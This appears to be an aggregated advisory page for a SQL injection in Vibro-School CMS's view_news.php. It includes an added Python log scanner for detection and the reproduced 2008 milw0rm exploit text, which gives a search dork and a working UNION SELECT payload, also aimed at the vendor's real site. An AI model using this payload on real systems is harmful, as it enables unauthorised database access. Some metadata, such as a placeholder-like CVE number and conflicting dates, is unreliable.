Vendor: Vibro-School CMS
By: Maghribi WnaftakhaR
CVSS: 7.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Vibro-School CMS
Affected Version From: 1
Affected Version To: 2
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: a:vibro-school:vibro-school_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

Vibro-School CMS (nID) Remote SQL injection Vulnerability

Vibro-School CMS is vulnerable to remote SQL injection through the nID parameter of view_news.php. Because the application does not properly validate this input, an attacker can send a specially crafted HTTP request containing malicious SQL code, which can be used to gain access to the database and potentially to sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability.
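
To check whether an installation was probed before the patch was applied, the following added example (not part of the original advisory or the vendor's code) scans web-server access logs for view_news.php requests whose nID value is not a plain integer. The Apache combined log format, the sample lines and the rule that legitimate news IDs are short non-negative integers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Nov/2008:10:01:12 +0000] "GET /Vibro-School-CMS/view_news.php?nID=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2008:10:02:40 +0000] "GET /Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Nov/2008:10:03:05 +0000] "GET /Vibro-School-CMS/view_news.php?nID=3%27 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Nov/2008:10:04:00 +0000] "GET /Vibro-School-CMS/index.php?nID=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.8 - - [04/Nov/2008:10:05:00 +0000] "GET /Vibro-School-CMS/view_news.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client IP, request target and status code from one combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Assumption: a legitimate news ID is a short, non-negative decimal integer.
NID_OK = re.compile(r"[0-9]{1,10}")


def suspicious_nid_requests(log_text):
    """Return (line_no, client_ip, status, decoded_nID) for each non-integer nID."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/view_news.php"):
            continue  # only the script named in the advisory is in scope
        # parse_qs decodes %XX escapes and '+', so encoded input is compared decoded.
        params = parse_qs(url.query, keep_blank_values=True)
        for name, values in params.items():
            if name.lower() != "nid":
                continue
            for value in values:
                if not NID_OK.fullmatch(value):
                    findings.append((lineno, m["ip"], int(m["status"]), value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_nid_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced server-side before the value reaches the query, is the input validation the description says was missing.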

Exploit-DB raw data:

Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=                Vibro-School CMS (nID) Remote SQL injection Vulnerability                  =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://www.niclor.net/prodotti/Vibro-School-CMS


dork    : Vibro-School CMS by nicLOR.net

Exploit : http://localhost/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--


live demo :


http://www.niclor.net/prodotti/Vibro-School-CMS/view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--

---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
-=                                                                                         =-
-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Special ThanX To My Friend StaCk & All KazaWa Boys :)

# milw0rm.com [2008-11-04]